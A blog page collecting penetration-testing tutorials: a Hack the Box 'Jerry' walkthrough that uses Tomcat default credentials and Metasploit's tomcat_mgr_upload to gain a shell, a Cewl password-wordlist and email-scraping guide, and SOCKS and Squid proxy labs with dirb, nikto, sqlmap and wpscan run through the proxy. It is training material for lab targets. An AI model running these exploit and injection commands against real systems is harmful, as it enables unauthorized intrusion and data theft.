Showing posts with label Penetration Testing. Show all posts
Showing posts with label Penetration Testing. Show all posts

Hack the Box: Jerry Walkthrough


Hello CTF Crackers!! Today we are going to capture the flag on a Challenge named as “Jerry” which is available online for those who want to increase their skill in penetration testing and black box testing. Jerry is a retired vulnerable lab presented by ‘Hack the Box’ for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to expert level.
Level: Easy
Flags: There are two flags. (user.txt & root.txt)
IP Address: 10.10.10.95
Methodology:
§  Port scanning and IP discovery
§  Browsing the IP on port 8080
§  Enumerating served webpage
§  Getting Login Credentials
§  Attacking using Metasploit
§  Getting root Access
§  Reading the flags
Walkthrough
Since these labs are available online via VPN therefore, they have a static IP. The IP of Jerry is 10.10.10.95
Let’s start off with scanning the network to find our target
nmap -sV 10.10.10.95


So here, we notice very interesting result from nmap scan, here it shows port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1
Next order of business is to browse the IP on a Web Browser.


On opening the IP on the Web Browser, we are greeted with the default TomCat page. After some enumeration here and there, we found the “Manager App” Link. On clicking on this link, we are struck with a Login Form as shown below.


Here, after some twerking with some passwords and other stuff, we found that clicking on “Cancel” Button triggers a 401 Error.


After closely reading the example on the webpage provided, we got the Logon Credentials
User: tomcat
Password: s3cret
Its time to attack, using the swiss knife of any penetration tester – “Metasploit”.
After doing some research and some tries, it was clear that we can use the tomcat_mgr_upload exploit.
So, let’s do this:
msf> use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost 10.10.10.95
msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080
msf exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
msf exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret
msf exploit(multi/http/tomcat_mgr_upload) > exploit
As show in the screenshot provided below, it is clear that the exploit runs successfully and gives an meterpreter session with elevated privileges.
We traverse through the Directories to get flag using commands like “ls” and “cd”


After a little bit of enumeration, we get to the C:\Users directory. Here we come across the Administrator User Directory so we traverse to that directory. And the further we traverse to the Desktop Directory.
This gives us the flags directory, which on opening gives us a text file named 2 for the price of 1. On opening we get both the user and root password.



Comprehensive Guide on Cewl Tool


Hello Friends!! In this article we are focusing on Generating Wordlist using Kali Linux tool Cewl and learn more about its available options.

Table of Content
§  Introduction to Cewl
§  Default Method
§  Save Wordlist in a file
§  Generating Wordlist of Specific Length
§  Retrieving Emails from a Website
§  Count the number of Word Repeated in a website
§  Increase the Depth to Spider
§  Extra Debug Information
§  Verbose Mode
§  Generating Alpha-Numeric
§  Cewl with Digest/Basic Authentication
§  Proxy URL

Introduction to Cewl

CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper. CeWL also has an associated command line app, FAB (Files Already Bagged) which uses the same meta data extraction techniques to create author/creator lists from already downloaded.


Type “cewl -h” in the terminal, it will dump all the available options it accepts along with their respective description.
SYNTAX: cewl [options]


Genral Options
                -h, --help:                            Show help.
                -k, --keep:                           Keep the downloaded file.
                -d ,--depth :        Depth to spider to, default 2.
                -m, --min_word_length: Minimum word length, default 3.
                -o, --offsite:                       Let the spider visit other sites.
                -w, --write:                         Write the output to the file.
                -u, --ua :              User agent to send.
                -n, --no-words:                                 Don't output the wordlist.
                --with-numbers:              Accept words with numbers in as well as just letters
                -a, --meta:                          include meta data.
                --meta_file file:                                Output file for Meta data.
                -e, --email:                          Include email addresses.
                --email_file :           Output file for email addresses.
                --meta-temp-dir
: The temporary directory used by exiftool when parsing files, default /tmp.
                -c, --count:                          Show the count for each word found.
                -v, --verbose:                    Verbose.
                --debug:                              Extra debug information.
     
                Authentication
                --auth_type:                      Digest or basic.
                --auth_user:                      Authentication username.
                --auth_pass:                      Authentication password.
     
                Proxy Support
                --proxy_host:                    Proxy host.
                --proxy_port:                    Proxy port, default 8080.
                --proxy_username:        Username for proxy, if required.
                --proxy_password:         Password for proxy, if required.



Default Method

Enter the following command which spiders the given url to a specified depth and print a list of words which can then be used as dictionary for cracking password.
cewl http://www.ignitetechnologies.in/


Save Wordlist in a file

For the purpose of the record maintenance, better readability and future references, we save the print list of word onto a file. To this we will use the parameter -w to save the output in a text file.

cewl http://www.ignitetechnologies.in/ -w dict.txt

Now that we have successfully executed the command, now let’s traverse to the location to ensure whether the output has been saved on the file on not. In this case our location for output is /root /dict.txt.
cat dict.txt




Generating Wordlist of Specific Length

If you want to generate wordlist of a specific word length then use -m option as it enables minimum words limit parameter.

cewl http://www.ignitetechnologies.in/ -m 9

The above command will generate a list of minimum 9 words, as you can observe in following image, it has crawl to the given website and print the list of word with minimum 9 characters.

Retrieving Emails from a Website

You can use -e option that enables email parameter along with -n option that hides the list of word generated while crawling the given website.

cewl http://www.ignitetechnologies.in/ -n -e

As shown in the below image, it has successfully found 1 email-id from inside the website.



Count the number of Word Repeated in a website

If you want to count the number of words repeated several times in a website, then use -c options that enables count parameter.
cewl http://www.ignitetechnologies.in/ -c
As you can observe from the given below image that it has print the count for each word which is repeated in the given website.



Increase the Depth to Spider
If you want to increase the level of spider for generating larger list of word by enumerating more new words from the website then use -d option along with depth level number that enables depth parameter for making more intense creeping. By Default it the depth level set is 2.

cewl http://www.ignitetechnologies.in/ -d 3

Extra Debug Information

You can use -d option that enables debug mode and shows error and raw detail of website while crawling.

cewl http://www.ignitetechnologies.in/ --debug

Verbose Mode

To expand the website crawling result and for retrieving completed detail of a website, you can use -v option for verbose mode. Rather than generating wordlist, it will dump the information available on the website.

cewl http://www.ignitetechnologies.in/ -v


Generating Alpha-Numeric

If you want to generate an alpha-numeric wordlist then you can use --with-numbers option along with command.
cewl http://testphp.vulnweb.com/ --with-numbers


From the given below image you can observe, this time it has generated an alpha-numeric wordlist.



Cewl with Digest/Basic Authentication

If there is page authentication for login into website then above default will not work properly, in order to generate a wordlist you need to bypass the authentication page by using the following parameter:
--auth_type:                      Digest or basic.
--auth_user:                      Authentication username.
--auth_pass:                      Authentication password.

cewl http://192.168.1.105/dvwa/login.php --auth_type Digest --auth_user admin --auth_pass password -v
or
cewl http://192.168.1.105/dvwa/login.php --auth_type basic --auth_user admin --auth_pass password -v

From the given below image you can observe, it has got http-response 200 and hence generated the wordlist.



Proxy URL

When any website is running behind any proxy server then cewl will not able to generate wordlist with the help of default command as shown in the given below image.

cewl -w dict.txt http://192.168.1.103/wordpress/
You can use --proxy option to enable Proxy URL parameter to generate a wordlist with the help of following command:
cewl --proxy_host 192.168.1.103 --proxy_port 3128 -w dict.txt http://192.168.1.103/wordpress/
As you can observer in the given below image after executing 2nd command, it has successfully print the list of word as output result.

Socks Proxy Penetration Lab Setup using Microsocks


Socks Proxy Penetration Lab Setup using Microsocks
Hello friends!! In our previous article we have disccuss “Web Proxy Penetration Lab Setup Testing using Squid” and today’s article we are going to setup SOCKS Proxy to use it as a Proxy Server on Ubuntu/Debian machines and will try to penetrate it.
Table of Content
·         Intoduction to proxy
·         What is socks proxy
·         Difference Between Socks proxy and HTTP Proxy
·         Socks proxy Installation
·         Web Proxy Penetration Testing
·         SSH Proxy Penetration Testing
·         FTP Proxy Penetration Testing
Intoduction to Proxy
A proxy is a computer system or program that acts as a kind of middle-man or an intermediary to come between your web browser and another computer. Your ISP operates servers– computers designed to deliver information to other computers. It uses proxy servers to accelerate the transfer of information between the server and your computer.
For Example: Two users say A and B both has requested to access same website of the server then Instead of retrieving the data from the original server, the proxy has “stored or cached” a copy of that site and sends it to User A without troubling the main server.

What is SOCKS Proxy?
A SOCKS server is a all-purpose proxy server that creates a TCP connection to another server on the client’s behalf, then exchanges network packets between a client and server. The Tor onion proxy software serves a SOCKS interface to its clients. Even SSH tunnel makes all the connections as per the SOCKS protocol.
For high security you can go with SOCKS5 protocol that provides various authentication options which you cannot get with the SOCKS4 protocol.
Difference Between Socks proxy and HTTP Proxy
§  SOCKS Proxy is low-level which is designed to be an general proxy that will be able to accommodate effectively any protocol, program, or type of traffic.
§  SOCKS proxies support both TCP and UDP transfer protocols
§  SOCKS performs at Layer 5 of the OSI model SOCKS server
§  Accepts incoming client connection on TCP port 1080.
§  HTTP proxies proxy HTTP requests, while SOCKS proxies proxy socket connections
§  HTTP proxies is High-Level which are designed for a specific protocol.
§  HTTP proxies can only process requests from applications that use the HTTP protocol.
§  An HTTP proxy is for proxying HTTP or web traffic at layer 7
§  Accepts incoming client connection on HTTP port 3128.
Socks Proxy Installation
For socks proxy lab set-up we are going to download microsocks through github. MicroSocks is multithreaded, small, efficient SOCKS5 server. It's very lightweight, and very light on resources too. Even for every client, a thread with a stack size of 8KB is spawned.

Lest’s start!!
Open the terminal with sudo rights and enter the following command:
git clone https://github.com/rofl0r/microsocks.git



Once downloading is completed run the following command for its installation:
cd microsocks
make
make install



Now execute the following command to run socks proxy on port 1080 without authentication.
microsocks -p 1080


As you can observe FTP, SSH, HTTP and Socks is running in our local machine and now let’s go for socks penetration testing on various protocol to ensure whether it is all-purpose program or not as said above.


Web Proxy Penetration Testing
Now Configuring Apache service for Web Proxy, therefore, open the “000-default.conf” file from the path: /etc/apache2/sites-available/ and add following line to implement the following rules on /html directory over localhost or Machine IP (192.168.1.103).
                Options Indexes FollowSymLinks MultiViews
                AllowOverride None
                Order deny,allow
                deny from all
        allow from 127.0.0.1 192.168.1.103
Now the save the file and restart the apache service with the help of following command.
service apache2 start

Now when someone try to access web services through our network i.e. 192.168.1.103, he/she will welcome by following web page
“Error 403 Forbidden- You don’t have permission to access ”.
When you face such type of situation where port 80 is open but you are unable to access it, hence proved the network is running behind proxy server.



For web Proxy penetration testing we had already set-up lab for web application server such as DVWA (Read Article from here).
Now to test whether our  proxy server is working or not by configuring , let’s open Firefox and go to Edit –> Preferences –> Advanced –> Network –> Settings and then select “Manual proxy configuration” and enter SOCKS proxy server IP address (192.168.1.103) and Port (1080) to be used for all protocol.


BOOMMM!! Connected to Proxy server successfully using HTTP Proxy in our Browser.


SSH Proxy Penetration Testing

Now configuring host.allow file for SSH Proxy therefore open /etc/host.allow file and following line to allow SSH connection on localhost IP and restrict for others.
sshd : localhost : allow
sshd : 192.168.1.103: allow
sshd : ALL: deny



Now open proxychains configuration file from the given path /etc/proxychains.conf in your kali Linux and then add following line at the bottom.
socks5 192.168.1.103 1080

Now when we try to connect with target machine via port 22 for SSH connection we got an error message “Connection reset by peer” as shown in below image after executing 1st command.
ssh pentest@192.168.1.103  
When you face such type of situation where port 22 is open but you are unable to access it, hence proved the network is running behind proxy server.
But if you will use proxychains along with the command after saving the configuration as said above then you can easily connect with target network via port 22 for ssh connection as shown in below image after executing 2nd command.
proxychains ssh pentest@192.168.1.103 

FTP Proxy Penetration Testing
Now configuring vsftpd.conf file for FTP Proxy therefore open /etc/vsftpd.conf file and add thefollowing line to allow FTP connection on localhost IP and restrict for others networks.

Order Allow, Deny
Allow from 127.0.0.1 192.168.1.103
Deny from all


Using fileZilla when we try to connect 192.168.1.103 via port 21 for accessing FTP service, we got an Error “Connection closed by server”.
When you face such type of situation where port 21 is open but you are unable to access it, hence proved the network is running behind proxy server.



But FileZilla has multi features as it offers generic proxy option that forced passive mode on FTP connection. Go to Settings > Connection > FTP and select “generic proxy” option and made the following configuration settings.
§  Choose SOCKS 5 as generic Proxy
§  Proxy HOST IP: 192.168.1.103
§  Proxy Port: 1080

 

Now again when you will try to connect the target machine via port 21 for accessing FTP service then you will be easily able to access it as shown in the last image.
Hence Proved the SOCKS is actually all-purpose proxy server and Hopefully, you have found this article very helpful and completely understood the working of Proxy server and other related topic cover in this article.


Web Proxy Penetration Lab Setup Testing using Squid


In this article we are going to setup Squid server to use it as a Proxy Server on Ubuntu/Debian machines and will try to penetrate it.

Table of content
§  Introduction to Proxy Setting
§  Squid Proxy Installation
§  Squid Proxy Server Configuration
§  Configuring Apache service for Web Proxy
§  Set-up Manual Proxy in the Browser
§  Directory Brute force Attack on Proxy Server Using DIRB Tool
§  Vulnerability Scanning on Proxy Server Using Nikto Tool
§  SQL Injection on Proxy Server Using Sqlmap Tool
§  WordPress Scanning on Proxy Server Using WPScan Tool

Introduction to Proxy Setting
A proxy is a computer system or program which acts as a kind of middle-man that allow an intermediary to come between your web browser and another computer. Your ISP operates servers– computers designed to deliver information to other computers. It uses proxy servers to accelerate the transfer of information between the server and your computer.

For Example: Two users say A and B has requested to access same website of the server then Instead of retrieving the data from the original server, the proxy has “stored or cached” a copy of that site and sends it to User A without troubling the main server.

Squid Proxy Installation

Squid is a cross functional web proxy cache server application which offers proxy and cache services for HTTP, FTP, and other common network protocols such as proxying of Secure Sockets Layer (SSL) requests and caching of Domain Name Server (DNS) lookups, and implement transparent caching. Moreover it also maintains a wide variety of caching protocols.

Open the host file in your local machine to add localhost address and hostname, because by default squid3 search for Ubuntu as hostname for connection implementation.


Now use apt Repository to install squid3 and enter following command.
apt-get install squid3
Squid Proxy Server Configuration

Once it the installation completed, open its configuration file from the given path: /etc/squid3/squid.conf
With Squid's access control, you may possibly shape use of Internet services proxy by Squid to be accessible only employers with specific IP addresses.
Suppose you want to grant access by users of the 192.168.1.0/24 subnetwork only, then add the following line to the  ACL section of the squid.conf file:
acl lan src 192.168.1.0/24


Now give permission to your clients to access HTTP service over local network.
http_access allow lan
To set your Squid server to listen on the default TCP port 3128, change the http_port directive as such:
http_port 3128
Add following roles for squid after adding HTTP_Port
request_header_access Referer deny all
request_header_access X-Forwarded-For deny all
request_header_access Via deny all
request_header_access Cache-Control deny all

You can Set forwarded_for :-     on|off|transparent|truncate|delete
1.       If set to "on", Squid will append your client's IP address in the HTTP requests it forwards. By default it looks like:
X-Forwarded-For: 192.1.2.3
2.       If set to "off", it will appear as
X-Forwarded-For: unknown
3.       If set to "transparent", Squid will not alter the
X-Forwarded-For header in any way.
4.       If set to "delete", Squid will delete the entire
X-Forwarded-For header.
5.       If set to "truncate", Squid will remove all existing




Here we had set forwarded_for off and save the file, then use the following command to restart the Squid Proxy.
sudo service squid3 restart



Configuring Apache service for Web Proxy
Now open the “000-default.conf” file from the path: /etc/apache2/sites-available/ and add following line to implement following rules on /html directory for localhost or Machine IP (192.168.1.103)
                Options Indexes FollowSymLinks MultiViews
                AllowOverride None
                Order deny,allow
                deny from all
        allow from 127.0.0.1 192.168.1.103
       

Now the save the file and restart the apache service with help of following command.
service apache2 start


Now when some try access http service of our network i.e. 192.168.1.103, he/she will welcome by following web page
“Error 403 Forbidden- You don’t have permission to access ”.

When you face such type of situation where port 80 is open but you are unable to access it, hence proved the network is running behind proxy server.


Set-up Manual Proxy in the Browser

Now to test whether our  proxy server is working or not by configuring , let’s open Firefox and go to Edit –> Preferences –> Advanced –> Network –> Settings and then select “Manual proxy configuration” and enter proxy server IP address (192.168.1.103) and Port (3128) to be used for all protocol.


BOOMMM!! Connected to Proxy server successfully using HTTP Proxy in our Browser.
Directory Brute force Attack on Proxy Server Using DIRB Tool
While making directory brute force attack via DIRB we can use –p option, it enables proxy URL to be used for all requests, by default it works on port 1080. As you have observe, on exploring target network IP in the web browser it put up “Access forbidden error” which means this web page is running behind some proxy.
dirb http://192.168.1.103
dirb http://192.168.1.103 –p 192.168.1.103:3128
From the given below image, you can take reference for the output result obtained for above commands, here we haven’t obtain any directory or file on executing 1st command where as in 2nd command executed successfully.

Vulnerability Scanning on Proxy Server Using Nikto Tool
Similarly while scanning any network running behind proxy server, we can use -useproxy option to scan the vulnerability.
nikto -h 192.168.1.103
nikto -h 192.168.1.103 -useproxy http://192.168.1.103:3128
From the given below image, you can take reference for the output result obtained for above commands, here we haven’t obtain any result on executing 1st command where as in 2nd command executed successfully.

SQL Injection on Proxy Server Using Sqlmap Tool
As you have observe, on executing following command it put up “403 forbidden error” which means this web page is running behind some proxy.
sqlmap -u http://192.168.1.103/sqli/Less-1/?id=1 --dbs

Hence we can use --proxy options to connect to the target URL, therefore execute following command:
sqlmap -u http://192.168.1.103/sqli/Less-1/?id=1 --dbs --proxy http://192.168.1.103:3128

Now from the given below image you can observe that we have successfully retrieve database name by exploiting SQL injection vulnerability.

WordPress Scanning on Proxy Server Using WPScan Tool
As you have observe, on executing following command it put up “403 forbidden error” which means this web page is running behind some proxy.
wpscan --url http://192.168.1.103/wordpress --wp-content-dir wp-content
Hence we can use --proxy options to connect to the target URL, therefore execute the following command:
wpscan --url http://192.168.1.103/wordpress --wp-content-dir wp-content  --proxy http://192.168.1.103:3128
Hopefully, you have found this article very helpful and completely understood the working of Proxy server and other related topic cover in this article.